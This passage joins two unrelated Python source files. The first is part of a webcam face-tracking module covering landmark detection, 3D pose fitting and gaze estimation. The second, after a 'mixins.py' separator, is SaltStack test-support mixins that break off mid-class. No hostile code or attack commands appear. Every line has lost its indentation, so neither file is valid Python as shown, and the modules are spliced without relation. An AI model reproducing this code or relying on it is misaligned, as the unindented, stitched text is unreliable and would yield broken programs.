[ 0.415033422928434, -0.088941454648772, -0.747947437846473],
[ 0.389123587370091, -0.232380029794684, -0.704788385327458],
[ 0.334630113904382, -0.361265387599081, -0.615587579236862],
[ 0.263725112132858, -0.460009725616771, -0.491479221041573],
[ 0.16241621322721 , -0.558037146073869, -0.339445180872282],
[ 0. , -0.621079019321682, -0.287294770748887],
[-0.16241621322721 , -0.558037146073869, -0.339445180872282],
[-0.263725112132858, -0.460009725616771, -0.491479221041573],
[-0.334630113904382, -0.361265387599081, -0.615587579236862],
[-0.389123587370091, -0.232380029794684, -0.704788385327458],
[-0.415033422928434, -0.088941454648772, -0.747947437846473],
[-0.437431554952677, 0.022655479179981, -0.739267175112735],
[-0.448998827123556, 0.166995837790733, -0.765143004071253],
[-0.4551769692672 , 0.300895790030204, -0.764429433974752],
[ 0.385529968662985, 0.402800553948697, -0.310031082540741],
[ 0.322196658344302, 0.464439136821772, -0.250558059367669],
[ 0.25409760441282 , 0.46420381416882 , -0.208177722146526],
[ 0.186875436782135, 0.44706071961879 , -0.145299823706503],
[ 0.120880983543622, 0.423566314072968, -0.110757158774771],
[-0.120880983543622, 0.423566314072968, -0.110757158774771],
[-0.186875436782135, 0.44706071961879 , -0.145299823706503],
[-0.25409760441282 , 0.46420381416882 , -0.208177722146526],
[-0.322196658344302, 0.464439136821772, -0.250558059367669],
[-0.385529968662985, 0.402800553948697, -0.310031082540741],
[ 0. , 0.293332603215811, -0.137582088779393],
[ 0. , 0.194828701837823, -0.069158109325951],
[ 0. , 0.103844017393155, -0.009151819844964],
[ 0. , 0. , 0. ],
[ 0.080626352317973, -0.041276068128093, -0.134161035564826],
[ 0.046439347377934, -0.057675223874769, -0.102990627164664],
[ 0. , -0.068753126205604, -0.090545348482397],
[-0.046439347377934, -0.057675223874769, -0.102990627164664],
[-0.080626352317973, -0.041276068128093, -0.134161035564826],
[ 0.315905195966084, 0.298337502555443, -0.285107407636464],
[ 0.275252345439353, 0.312721904921771, -0.244558251170671],
[ 0.176394511553111, 0.311907184376107, -0.219205360345231],
[ 0.131229723798772, 0.284447361805627, -0.234239149487417],
[ 0.184124948330084, 0.260179585304867, -0.226590776513707],
[ 0.279433549294448, 0.267363071770222, -0.248441437111633],
[-0.131229723798772, 0.284447361805627, -0.234239149487417],
[-0.176394511553111, 0.311907184376107, -0.219205360345231],
[-0.275252345439353, 0.312721904921771, -0.244558251170671],
[-0.315905195966084, 0.298337502555443, -0.285107407636464],
[-0.279433549294448, 0.267363071770222, -0.248441437111633],
[-0.184124948330084, 0.260179585304867, -0.226590776513707],
[ 0.121155252430729, -0.208988660580347, -0.160606287940521],
[ 0.041356305910044, -0.194484199722098, -0.096159882202821],
[ 0. , -0.205180167345702, -0.083299217789729],
[-0.041356305910044, -0.194484199722098, -0.096159882202821],
[-0.121155252430729, -0.208988660580347, -0.160606287940521],
[-0.132325402795928, -0.290857984604968, -0.187067868218105],
[-0.064137791831655, -0.325377847425684, -0.158924039726607],
[ 0. , -0.343742581679188, -0.113925986025684],
[ 0.064137791831655, -0.325377847425684, -0.158924039726607],
[ 0.132325402795928, -0.290857984604968, -0.187067868218105],
[ 0.181481567104525, -0.243239316141725, -0.231284988892766],
[ 0.083999507750469, -0.239717753728704, -0.155256465640701],
[ 0. , -0.256058040176369, -0.0950619498899 ],
[-0.083999507750469, -0.239717753728704, -0.155256465640701],
[-0.181481567104525, -0.243239316141725, -0.231284988892766],
[-0.074036069749345, -0.250689938345682, -0.177346470406188],
[ 0. , -0.264945854681568, -0.112349967428413],
[ 0.074036069749345, -0.250689938345682, -0.177346470406188],
# Pupils and eyeball centers
[ 0.257990002632141, 0.276080012321472, -0.219998998939991],
[-0.257990002632141, 0.276080012321472, -0.219998998939991],
[ 0.257990002632141, 0.276080012321472, -0.324570998549461],
[-0.257990002632141, 0.276080012321472, -0.324570998549461]
], np.float32)
self.camera = np.array([[width, 0, width/2], [0, width, height/2], [0, 0, 1]], np.float32)
self.inverse_camera = np.linalg.inv(self.camera)
self.dist_coeffs = np.zeros((4,1))
self.frame_count = 0
self.width = width
self.height = height
self.threshold = threshold
self.max_faces = max_faces
self.max_threads = max_threads
self.discard = 0
self.discard_after = discard_after
self.detected = 0
self.wait_count = 0
self.scan_every = scan_every
self.bbox_growth = bbox_growth
self.silent = silent
self.res = 224.
self.res_i = int(self.res)
self.no_gaze = no_gaze
self.debug_gaze = False
self.face_info = [FaceInfo(id, self) for id in range(max_faces)]
self.fail_count = 0
def detect_faces(self, frame):
im = cv2.resize(frame, (224, 224), interpolation=cv2.INTER_LINEAR)[:,:,::-1] / self.std - self.mean
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,1,2))
outputs, maxpool = self.detection.run([], {'input': im})
outputs = np.array(outputs)
maxpool = np.array(maxpool)
outputs[0, 0, outputs[0, 0] != maxpool[0, 0]] = 0
detections = np.flip(np.argsort(outputs[0,0].flatten()))
results = []
for det in detections[0:self.max_faces]:
y, x = det // 56, det % 56
c = outputs[0, 0, y, x]
r = outputs[0, 1, y, x] * 112.
x *= 4
y *= 4
r *= 1.0
if c < self.threshold:
break
results.append((x - r, y - r, 2 * r, 2 * r * 1.0))
results = np.array(results).astype(np.float32)
if results.shape[0] > 0:
results[:, [0,2]] *= frame.shape[1] / 224.
results[:, [1,3]] *= frame.shape[0] / 224.
return results
def landmarks(self, tensor, crop_info):
crop_x1, crop_y1, scale_x, scale_y, _ = crop_info
avg_conf = 0
lms = []
res = self.res - 1
for i in range(0, 66):
m = int(tensor[i].argmax())
x = m // 28
y = m % 28
conf = float(tensor[i][x,y])
avg_conf = avg_conf + conf
off_x = res * ((1. * logit(tensor[66 + i][x, y])) - 0.0)
off_y = res * ((1. * logit(tensor[66 * 2 + i][x, y])) - 0.0)
off_x = math.floor(off_x + 0.5)
off_y = math.floor(off_y + 0.5)
lm_x = crop_y1 + scale_y * (res * (float(x) / 27.) + off_x)
lm_y = crop_x1 + scale_x * (res * (float(y) / 27.) + off_y)
lms.append((lm_x,lm_y,conf))
avg_conf = avg_conf / 66.
return (avg_conf, np.array(lms))
def estimate_depth(self, face_info):
lms = np.concatenate((face_info.lms, np.array([[face_info.eye_state[0][1], face_info.eye_state[0][2], face_info.eye_state[0][3]], [face_info.eye_state[1][1], face_info.eye_state[1][2], face_info.eye_state[1][3]]], np.float)), 0)
image_pts = np.array(lms)[face_info.contour_pts, 0:2]
success = False
if not face_info.rotation is None:
success, face_info.rotation, face_info.translation = cv2.solvePnP(face_info.contour, image_pts, self.camera, self.dist_coeffs, useExtrinsicGuess=True, rvec=np.transpose(face_info.rotation), tvec=np.transpose(face_info.translation), flags=cv2.SOLVEPNP_ITERATIVE)
else:
rvec = np.array([0, 0, 0], np.float32)
tvec = np.array([0, 0, 0], np.float32)
success, face_info.rotation, face_info.translation = cv2.solvePnP(face_info.contour, image_pts, self.camera, self.dist_coeffs, useExtrinsicGuess=True, rvec=rvec, tvec=tvec, flags=cv2.SOLVEPNP_ITERATIVE)
rotation = face_info.rotation
translation = face_info.translation
pts_3d = np.zeros((70,3), np.float32)
if not success:
face_info.rotation = np.array([0.0, 0.0, 0.0], np.float32)
face_info.translation = np.array([0.0, 0.0, 0.0], np.float32)
return False, np.zeros(4), np.zeros(3), 99999., pts_3d, lms
else:
face_info.rotation = np.transpose(face_info.rotation)
face_info.translation = np.transpose(face_info.translation)
rmat, _ = cv2.Rodrigues(rotation)
inverse_rotation = np.linalg.inv(rmat)
pnp_error = 0.0
for i, pt in enumerate(face_info.face_3d):
if i == 68:
# Right eyeball
# Eyeballs have an average diameter of 12.5mm and and the distance between eye corners is 30-35mm, so a conversion factor of 0.385 can be applied
eye_center = (pts_3d[36] + pts_3d[39]) / 2.0
d_corner = np.linalg.norm(pts_3d[36] - pts_3d[39])
depth = 0.385 * d_corner
pt_3d = np.array([eye_center[0], eye_center[1], eye_center[2] - depth])
pts_3d[i] = pt_3d
continue
if i == 69:
# Left eyeball
eye_center = (pts_3d[42] + pts_3d[45]) / 2.0
d_corner = np.linalg.norm(pts_3d[42] - pts_3d[45])
depth = 0.385 * d_corner
pt_3d = np.array([eye_center[0], eye_center[1], eye_center[2] - depth])
pts_3d[i] = pt_3d
continue
if i == 66:
d1 = np.linalg.norm(lms[i,0:2] - lms[36,0:2])
d2 = np.linalg.norm(lms[i,0:2] - lms[39,0:2])
d = d1 + d2
pt = (pts_3d[36] * d1 + pts_3d[39] * d2) / d
if i == 67:
d1 = np.linalg.norm(lms[i,0:2] - lms[42,0:2])
d2 = np.linalg.norm(lms[i,0:2] - lms[45,0:2])
d = d1 + d2
pt = (pts_3d[42] * d1 + pts_3d[45] * d2) / d
reference = rmat.dot(pt)
reference = reference + face_info.translation
reference = self.camera.dot(reference)
depth = reference[2]
if i < 17 or i == 30:
reference = reference / depth
e1 = lms[i][0] - reference[0]
e2 = lms[i][1] - reference[1]
pnp_error += e1*e1 + e2*e2
pt_3d = np.array([lms[i][0] * depth, lms[i][1] * depth, depth], np.float32)
pt_3d = self.inverse_camera.dot(pt_3d)
pt_3d = pt_3d - face_info.translation
pt_3d = inverse_rotation.dot(pt_3d)
pts_3d[i,:] = pt_3d[:]
pnp_error = np.sqrt(pnp_error / (2.0 * image_pts.shape[0]))
if pnp_error > 300:
face_info.fail_count += 1
if face_info.fail_count > 5:
# Something went wrong with adjusting the 3D model
if not self.silent:
print(f"Detected anomaly when 3D fitting face {face_info.id}. Resetting.")
face_info.face_3d = copy.copy(self.face_3d)
face_info.rotation = None
face_info.translation = np.array([0.0, 0.0, 0.0], np.float32)
face_info.update_counts = np.zeros((66,2))
face_info.update_contour()
else:
face_info.fail_count = 0
euler = cv2.RQDecomp3x3(rmat)[0]
return True, matrix_to_quaternion(rmat), euler, pnp_error, pts_3d, lms
def preprocess(self, im, crop):
x1, y1, x2, y2 = crop
im = np.float32(im[y1:y2, x1:x2,::-1]) # Crop and BGR to RGB
im = cv2.resize(im, (self.res_i, self.res_i), interpolation=cv2.INTER_LINEAR) / self.std - self.mean
#im = cv2.resize(im, (224, 224), interpolation=cv2.INTER_LINEAR) / 255.0
#im = (im - mean) / std
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,1,2))
return im
def equalize(self, im):
im_yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV)
im_yuv[:,:,0] = cv2.equalizeHist(im_yuv[:,:,0])
return cv2.cvtColor(im_yuv, cv2.COLOR_YUV2BGR)
def corners_to_eye(self, corners, w, h, flip):
((cx1, cy1), (cx2, cy2)) = corners
c1 = np.array([cx1, cy1])
c2 = np.array([cx2, cy2])
c2, a = compensate(c1, c2)
center = (c1 + c2) / 2.0
radius = np.linalg.norm(c1 - c2) / 2.0
radius = np.array([radius * 1.4, radius * 1.2])
upper_left = clamp_to_im(center - radius, w, h)
lower_right = clamp_to_im(center + radius, w, h)
return upper_left, lower_right, center, radius, c1, a
def prepare_eye(self, frame, full_frame, lms, flip):
outer_pt = tuple(lms[0])
inner_pt = tuple(lms[1])
h, w, _ = frame.shape
(x1, y1), (x2, y2), center, radius, reference, a = self.corners_to_eye((outer_pt, inner_pt), w, h, flip)
im = rotate_image(frame[:, :, ::], a, reference)
im = im[int(y1):int(y2), int(x1):int(x2),:]
if np.prod(im.shape) < 1:
return None, None, None, None, None, None
if flip:
im = cv2.flip(im, 1)
scale = np.array([(x2 - x1), (y2 - y1)]) / 32.
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_LINEAR)
#im = self.equalize(im)
if self.debug_gaze:
if not flip:
full_frame[0:32, 0:32] = im
else:
full_frame[0:32, 32:64] = im
im = im.astype(np.float32)[:,:,::-1] / self.std - self.mean
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,2,1))
return im, x1, y1, scale, reference, a
def extract_face(self, frame, lms):
lms = np.array(lms)[:,0:2][:,::-1]
x1, y1 = tuple(lms.min(0))
x2, y2 = tuple(lms.max(0))
radius_x = 1.2 * (x2 - x1) / 2.0
radius_y = 1.2 * (y2 - y1) / 2.0
radius = np.array((radius_x, radius_y))
center = (np.array((x1, y1)) + np.array((x2, y2))) / 2.0
w, h, _ = frame.shape
x1, y1 = clamp_to_im(center - radius, h, w)
x2, y2 = clamp_to_im(center + radius + 1, h, w)
offset = np.array((x1, y1))
lms = (lms[:, 0:2] - offset).astype(np.int)
frame = frame[y1:y2, x1:x2]
return frame, lms, offset
def get_eye_state(self, frame, lms, single=False):
if self.no_gaze:
return [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
lms = np.array(lms)
e_x = [0,0]
e_y = [0,0]
scale = [0,0]
reference = [None, None]
angles = [0, 0]
face_frame, lms, offset = self.extract_face(frame, lms)
(right_eye, e_x[0], e_y[0], scale[0], reference[0], angles[0]) = self.prepare_eye(face_frame, frame, np.array([lms[36,0:2], lms[39,0:2]]), False)
(left_eye, e_x[1], e_y[1], scale[1], reference[1], angles[1]) = self.prepare_eye(face_frame, frame, np.array([lms[42,0:2], lms[45,0:2]]), True)
if right_eye is None or left_eye is None:
return [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
both_eyes = np.concatenate((right_eye, left_eye))
results = None
if single:
results = self.gaze_model_single.run([], {self.input_name: both_eyes})
else:
results = self.gaze_model.run([], {self.input_name: both_eyes})
open = [0, 0]
open[0] = 1#results[1][0].argmax()
open[1] = 1#results[1][1].argmax()
results = np.array(results[0])
eye_state = []
for i in range(2):
m = int(results[i][0].argmax())
x = m // 8
y = m % 8
conf = float(results[i][0][x,y])
off_x = 32.0 * logit(results[i][1][x, y], 8.0)
off_y = 32.0 * logit(results[i][2][x, y], 8.0)
if i == 1:
eye_x = 32.0 * float(x) / 8.0 + off_x
else:
eye_x = 32.0 * float(x) / 8.0 + off_x
eye_y = 32.0 * float(y) / 8.0 + off_y
if self.debug_gaze:
if i == 0:
frame[int(eye_y), int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), int(eye_x+1)] = (0, 0, 255)
frame[int(eye_y), int(eye_x+1)] = (0, 0, 255)
else:
frame[int(eye_y), 32+int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), 32+int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), 32+int(eye_x+1)] = (0, 0, 255)
frame[int(eye_y), 32+int(eye_x+1)] = (0, 0, 255)
if i == 0:
eye_x = e_x[i] + scale[i][0] * eye_x
else:
eye_x = e_x[i] + scale[i][0] * (32. - eye_x)
eye_y = e_y[i] + scale[i][1] * eye_y
eye_x, eye_y = rotate(reference[i], (eye_x, eye_y), -angles[i])
eye_x = eye_x + offset[0]
eye_y = eye_y + offset[1]
eye_state.append([open[i], eye_y, eye_x, conf])
return eye_state
def assign_face_info(self, results):
result_coords = []
adjusted_results = []
for conf, (lms, eye_state), conf_adjust in results:
adjusted_results.append((conf - conf_adjust, (lms, eye_state)))
result_coords.append(np.array(lms)[:, 0:2].mean(0))
results = adjusted_results
candidates = [[]] * self.max_faces
max_dist = 2 * np.linalg.norm(np.array([self.width, self.height]))
for i, face_info in enumerate(self.face_info):
for j, coord in enumerate(result_coords):
if face_info.coord is None:
candidates[i].append((max_dist, i, j))
else:
candidates[i].append((np.linalg.norm(face_info.coord - coord), i, j))
for i, candidate in enumerate(candidates):
candidates[i] = sorted(candidate)
found = 0
target = len(results)
used_results = {}
used_faces = {}
while found < target:
min_list = min(candidates)
candidate = min_list.pop(0)
face_idx = candidate[1]
result_idx = candidate[2]
if not result_idx in used_results and not face_idx in used_faces:
self.face_info[face_idx].update(results[result_idx], result_coords[result_idx], self.frame_count)
min_list.clear()
used_results[result_idx] = True
used_faces[face_idx] = True
found += 1
if len(min_list) == 0:
min_list.append((2 * max_dist, face_idx, result_idx))
for face_info in self.face_info:
if face_info.frame_count != self.frame_count:
face_info.update(None, None, self.frame_count)
def predict(self, frame, additional_faces=[]):
self.frame_count += 1
start = time.perf_counter()
im = frame
duration_fd = 0.0
duration_pp = 0.0
duration_model = 0.0
duration_pnp = 0.0
new_faces = []
new_faces.extend(self.faces)
bonus_cutoff = len(self.faces)
new_faces.extend(additional_faces)
self.wait_count += 1
if self.detected == 0:
start_fd = time.perf_counter()
if self.use_retinaface > 0:
retinaface_detections = self.retinaface.detect_retina(frame)
new_faces.extend(retinaface_detections)
else:
new_faces.extend(self.detect_faces(frame))
duration_fd = 1000 * (time.perf_counter() - start_fd)
self.wait_count = 0
elif self.detected < self.max_faces:
if self.use_retinaface > 0:
new_faces.extend(self.retinaface_scan.get_results())
if self.wait_count >= self.scan_every:
if self.use_retinaface > 0:
self.retinaface_scan.background_detect(frame)
else:
start_fd = time.perf_counter()
new_faces.extend(self.detect_faces(frame))
duration_fd = 1000 * (time.perf_counter() - start_fd)
self.wait_count = 0
else:
self.wait_count = 0
if len(new_faces) < 1:
duration = (time.perf_counter() - start) * 1000
if not self.silent:
print(f"Took {duration:.2f}ms")
return []
crops = []
crop_info = []
num_crops = 0
for j, (x,y,w,h) in enumerate(new_faces):
crop_x1 = x - int(w * 0.1)
crop_y1 = y - int(h * 0.125)
crop_x2 = x + w + int(w * 0.1)
crop_y2 = y + h + int(h * 0.125)
crop_x1, crop_y1 = clamp_to_im((crop_x1, crop_y1), self.width, self.height)
crop_x2, crop_y2 = clamp_to_im((crop_x2, crop_y2), self.width, self.height)
scale_x = float(crop_x2 - crop_x1) / self.res
scale_y = float(crop_y2 - crop_y1) / self.res
if crop_x2 - crop_x1 < 4 or crop_y2 - crop_y1 < 4:
continue
start_pp = time.perf_counter()
crop = self.preprocess(im, (crop_x1, crop_y1, crop_x2, crop_y2))
duration_pp += 1000 * (time.perf_counter() - start_pp)
crops.append(crop)
crop_info.append((crop_x1, crop_y1, scale_x, scale_y, 0.0 if j >= bonus_cutoff else 0.1))
num_crops += 1
start_model = time.perf_counter()
outputs = {}
if num_crops == 1:
output = self.session.run([], {self.input_name: crops[0]})[0]
conf, lms = self.landmarks(output[0], crop_info[0])
if conf > self.threshold:
eye_state = self.get_eye_state(frame, lms)
outputs[crop_info[0]] = (conf, (lms, eye_state), 0)
else:
started = 0
results = queue.Queue()
for i in range(min(num_crops, self.max_workers)):
thread = threading.Thread(target=worker_thread, args=(self.sessions[started], frame, crops[started], crop_info[started], results, self.input_name, started, self))
started += 1
thread.start()
returned = 0
while returned < num_crops:
result = results.get(True)
if len(result) != 1:
session, conf, lms, sample_crop_info, idx = result
outputs[sample_crop_info] = (conf, lms, idx)
else:
session = result[0]
returned += 1
if started < num_crops:
thread = threading.Thread(target=worker_thread, args=(session, frame, crops[started], crop_info[started], results, self.input_name, started, self))
started += 1
thread.start()
actual_faces = []
good_crops = []
for crop in crop_info:
if crop not in outputs:
continue
conf, lms, i = outputs[crop]
x1, y1, _ = lms[0].min(0)
x2, y2, _ = lms[0].max(0)
bb = (x1, y1, x2 - x1, y2 - y1)
outputs[crop] = (conf, lms, i, bb)
actual_faces.append(bb)
good_crops.append(crop)
groups = group_rects(actual_faces)
best_results = {}
for crop in good_crops:
conf, lms, i, bb = outputs[crop]
if conf < self.threshold:
continue;
group_id = groups[str(bb)][0]
if not group_id in best_results:
best_results[group_id] = [-1, [], 0]
if conf > self.threshold and best_results[group_id][0] < conf + crop[4]:
best_results[group_id][0] = conf + crop[4]
best_results[group_id][1] = lms
best_results[group_id][2] = crop[4]
sorted_results = sorted(best_results.values(), key=lambda x: x[0], reverse=True)[:self.max_faces]
self.assign_face_info(sorted_results)
duration_model = 1000 * (time.perf_counter() - start_model)
results = []
detected = []
start_pnp = time.perf_counter()
for face_info in self.face_info:
if face_info.alive and face_info.conf > self.threshold:
face_info.success, face_info.quaternion, face_info.euler, face_info.pnp_error, face_info.pts_3d, face_info.lms = self.estimate_depth(face_info)
face_info.adjust_3d()
lms = face_info.lms[:, 0:2]
x1, y1 = tuple(lms.min(0))
x2, y2 = tuple(lms.max(0))
bbox = (y1, x1, y2 - y1, x2 - x1)
face_info.bbox = bbox
detected.append(bbox)
results.append(face_info)
duration_pnp += 1000 * (time.perf_counter() - start_pnp)
if len(detected) > 0:
self.detected = len(detected)
self.faces = detected
self.discard = 0
else:
self.detected = 0
self.discard += 1
if self.discard > self.discard_after:
self.faces = []
else:
if self.bbox_growth > 0:
faces = []
for (x,y,w,h) in self.faces:
x -= w * self.bbox_growth
y -= h * self.bbox_growth
w += 2 * w * self.bbox_growth
h += 2 * h * self.bbox_growth
faces.append((x,y,w,h))
self.faces = faces
duration = (time.perf_counter() - start) * 1000
if not self.silent:
print(f"Took {duration:.2f}ms (detect: {duration_fd:.2f}ms, crop: {duration_pp:.2f}, track: {duration_model:.2f}ms, 3D points: {duration_pnp:.2f}ms)")
results = sorted(results, key=lambda x: x.id)
return results
|
mixins.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: Pedro Algarvio (pedro@algarvio.me)
=============
Class Mix-Ins
=============
Some reusable class Mixins
'''
# pylint: disable=repr-flag-used-in-string
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import types
import atexit
import pprint
import logging
import tempfile
import functools
import subprocess
import multiprocessing
# Import Salt Testing Libs
from tests.support.mock import NO_MOCK, NO_MOCK_REASON, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.paths import CODE_DIR
# Import salt libs
import salt.config
import salt.utils.event
import salt.utils.files
import salt.utils.functools
import salt.utils.path
import salt.utils.stringutils
import salt.utils.yaml
import salt.version
import salt.exceptions
import salt.utils.process
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt._compat import ElementTree as etree
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import zip # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
class CheckShellBinaryNameAndVersionMixin(object):
'''
Simple class mix-in to subclass in companion to :class:`ShellTestCase<tests.support.case.ShellTestCase>` which
adds a test case to verify proper version report from Salt's CLI tools.
'''
_call_binary_ = None
_call_binary_expected_version_ = None
def test_version_includes_binary_name(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
if self._call_binary_expected_version_ is None:
# Late import
self._call_binary_expected_version_ = salt.version.__version__
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(self._call_binary_, out)
self.assertIn(self._call_binary_expected_version_, out)
class AdaptedConfigurationTestCaseMixin(object):
__slots__ = ()
@staticmethod
def get_temp_config(config_for, **config_overrides):
rootdir = tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
conf_dir = os.path.join(rootdir, 'conf')
for key in ('cachedir', 'pki_dir', 'sock_dir'):
if key not in config_overrides:
config_overrides[key] = key
if 'log_file' not in config_overrides:
config_overrides['log_file'] = 'logs/{}.log'.format(config_for)
if 'user' not in config_overrides:
config_overrides['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
config_overrides['root_dir'] = rootdir
cdict = AdaptedConfigurationTestCaseMixin.get_config(config_for, from_scratch=True)
if config_for in ('master', 'client_config'):
rdict = salt.config.apply_master_config(config_overrides, cdict)
if config_for == 'minion':
rdict = salt.config.apply_minion_config(config_overrides, cdict)
verify_env([os.path.join(rdict['pki_dir'], 'minions'),
os.path.join(rdict['pki_dir'], 'minions_pre'),
os.path.join(rdict['pki_dir'], 'minions_rejected'),
os.path.join(rdict['pki_dir'], 'minions_denied'),
os.path.join(rdict['cachedir'], 'jobs'),
os.path.join(rdict['cachedir'], 'raet'),
os.path.join(rdict['cachedir'], 'tokens'),
os.path.join(rdict['root_dir'], 'cache', 'tokens'),
os.path.join(rdict['pki_dir'], 'accepted'),
os.path.join(rdict['pki_dir'], 'rejected'),
os.path.join(rdict['pki_dir'], 'pending'),
os.path.dirname(rdict['log_file']),
rdict['sock_dir'],
conf_dir
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=rdict['root_dir'],
)
rdict['config_dir'] = conf_dir
rdict['conf_file'] = os.path.join(conf_dir, config_for)
with salt.utils.files.fopen(rdict['conf_file'], 'w') as wfh:
salt.utils.yaml.safe_dump(rdict, wfh, default_flow_style=False)
return rdict
@staticmethod
def get_config(config_for, from_scratch=False):
if from_scratch:
if config_for in ('master', 'syndic_master'):
return salt.config.master_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for)
)
elif config_for in ('minion', 'sub_minion'):
return salt.config.minion_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for)
)
elif config_for in ('syndic',):
return salt.config.syndic_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for),
AdaptedConfigurationTestCaseMixin.get_config_file_path('minion')
)
elif config_for == 'client_config':
return salt.config.client_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path('master')
)
if config_for not in RUNTIME_VARS.RUNTIME_CONFIGS:
if config_for in ('master', 'syndic_master'):
RUNTIME_VARS.RUNTIME_CONFIGS[config_for] = freeze(
salt.config.master_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for)
)
)
elif config_for in ('minion', 'sub_minion'):
RUNTIME_VARS.RUNTIME_CONFIGS[config_for] = freeze(
salt.config.minion_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for)
)
)
elif config_for in ('syndic',):
RUNTIME_VARS.RUNTIME_CONFIGS[config_for] = freeze(
salt.config.syndic_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for),
AdaptedConfigurationTestCaseMixin.get_config_file_path('minion')
)
)
elif config_for == 'client_config':
RUNTIME_VARS.RUNTIME_CONFIGS[config_for] = freeze(
salt.config.client_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path('master')
)
)
return RUNTIME_VARS.RUNTIME_CONFIGS[config_for]
@property
def config_dir(self):
return RUNTIME_VARS.TMP_CONF_DIR
def get_config_dir(self):
log.warning('Use the config_dir attribute instead of calling get_config_dir()')
return self.config_dir
@staticmethod
def get_config_file_path(filename):
if filename == 'syndic_master':
return os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master')
if filename == 'syndic':
return os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion')
if filename == 'sub_minion':
return os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion')
return os.path.join(RUNTIME_VARS.TMP_CONF_DIR, filename)
@property
def master_opts(self):
'''
Return the options used for the master
'''
return self.get_config('master')
@property
def minion_opts(self):
'''
Return the options used for the minion
'''
return self.get_config('minion')
@property
def sub_minion_opts(self):
'''
Return the options used for the sub_minion
'''
return self.get_config('sub_minion')
class SaltClientTestCaseMixin(AdaptedConfigurationTestCaseMixin):
'''
Mix-in class that provides a ``client`` attribute which returns a Salt
:class:`LocalClient<salt:salt.client.LocalClient>`.
.. code-block:: python
class LocalClientTestCase(TestCase, SaltClientTestCaseMixin):
def test_check_pub_data(self):
just_minions = {'minions': ['m1', 'm2']}
jid_no_minions = {'jid': '1234', 'minions': []}
valid_pub_data = {'minions': ['m1', 'm2'], 'jid': '1234'}
self.assertRaises(EauthAuthenticationError,
self.client._check_pub_data, None)
self.assertDictEqual({},
self.client._check_pub_data(just_minions),
'Did not handle lack of jid correctly')
self.assertDictEqual(
{},
self.client._check_pub_data({'jid': '0'}),
'Passing JID of zero is not handled gracefully')
'''
_salt_client_config_file_name_ = 'master'
@property
def client(self):
# Late import
import salt.client
if 'runtime_client' not in RUNTIME_VARS.RUNTIME_CONFIGS:
mopts = self.get_config(self._salt_client_config_file_name_, from_scratch=True)
RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(mopts=mopts)
return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client']
class ShellCaseCommonTestsMixin(CheckShellBinaryNameAndVersionMixin):
_call_binary_expected_version_ = salt.version.__version__
def test_salt_with_git_version(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
from salt.version import __version_info__, SaltStackVersion
git = salt.utils.path.which('git')
if not git:
self.skipTest('The git binary is not available')
opts = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'cwd': CODE_DIR,
}
if not salt.utils.platform.is_windows():
opts['close_fds'] = True
# Let's get the output of git describe
process = subprocess.Popen(
[git, 'describe', '--tags', '--first-parent', '--match', 'v[0-9]*'],
**opts
)
out, err = process.communicate()
if process.returncode != 0:
process = subprocess.Popen(
[git, 'describe', '--tags', '--match', 'v[0-9]*'],
**opts
)
out, err = process.communicate()
if not out:
self.skipTest(
'Failed to get the output of \'git describe\'. '
'Error: \'{0}\''.format(
salt.utils.stringutils.to_str(err)
)
)
parsed_version = SaltStackVersion.parse(out)
if parsed_version.info < __version_info__:
self.skipTest(
'We\'re likely about to release a new version. This test '
'would fail. Parsed(\'{0}\') < Expected(\'{1}\')'.format(
parsed_version.info, __version_info__
)
)
elif parsed_version.info != __version_info__:
self.skipTest(
'In order to get the proper salt version with the '
'git hash you need to update salt\'s local git '
'tags. Something like: \'git fetch --tags\' or '
'\'git fetch --tags upstream\' if you followed '
'salt\'s contribute documentation. The version '
'string WILL NOT include the git hash.'
)
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(parsed_version.string, out)
class _FixLoaderModuleMockMixinMroOrder(type):
'''
This metaclass will make sure that LoaderModuleMockMixin will always come as the first
base class in order for LoaderModuleMockMixin.setUp to actually run
'''
def __new__(mcs, cls_name, cls_bases, cls_dict):
if cls_name == 'LoaderModuleMockMixin':
return super(_FixLoaderModuleMockMixinMroOrder, mcs).__new__(mcs, cls_name, cls_bases, cls_dict)
bases = list(cls_bases)
for idx, base in enumerate(bases):
if base.__name__ == 'LoaderModuleMockMixin':
bases.insert(0, bases.pop(idx))
break
# Create the class instance
